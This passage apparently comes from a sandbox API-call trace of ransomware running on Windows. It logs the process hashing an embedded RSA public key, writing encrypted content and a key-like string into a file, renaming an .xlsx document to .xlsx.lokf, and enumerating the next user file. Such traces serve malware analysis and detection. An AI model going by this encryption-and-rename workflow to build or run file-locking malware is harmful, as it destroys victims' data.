KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.396] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.396] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.396] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.396] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.396] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.397] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.397] GetLastError () returned 0x0 [0060.397] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.397] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.397] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.397] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.397] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10810) returned 0x9c8bae8 [0060.397] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.397] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89250 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d70 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89298 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d88 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85db8 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85dd0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.398] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85db8 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85dd0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85db8 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85db8 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.398] GetCurrentThreadId () returned 0x9e0 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a910 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.399] GetCurrentThreadId () returned 0x9e0 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85db8 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85dd0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85da0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85de8 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85db8 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85db8 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85db8 | out: hHeap=0x660000) returned 1 [0060.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85de8 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85dd0 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85da0 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d88 | out: hHeap=0x660000) returned 1 [0060.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89298 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.402] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x1080e, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x1080e, lpOverlapped=0x0) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.402] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10813, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.402] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.403] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.403] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.403] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.403] CloseHandle (hObject=0x5cc) returned 1 [0060.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.404] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\K01vTC0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\k01vtc0.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\K01vTC0.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\k01vtc0.xlsx.lokf")) returned 1 [0060.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.404] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0060.405] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e35610, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0x3afb96d0, ftLastAccessTime.dwHighDateTime=0x1d4d417, ftLastWriteTime.dwLowDateTime=0x3afb96d0, ftLastWriteTime.dwHighDateTime=0x1d4d417, nFileSizeHigh=0x0, nFileSizeLow=0x55a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r8w4K7BjGpJr7cvfGvO.ots", cAlternateFileName="R8W4K7~1.OTS")) returned 1 [0060.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0060.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32add78 | out: hHeap=0x660000) returned 1 [0060.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\r8w4K7BjGpJr7cvfGvO.ots") returned=".ots" [0060.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\r8w4K7BjGpJr7cvfGvO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- 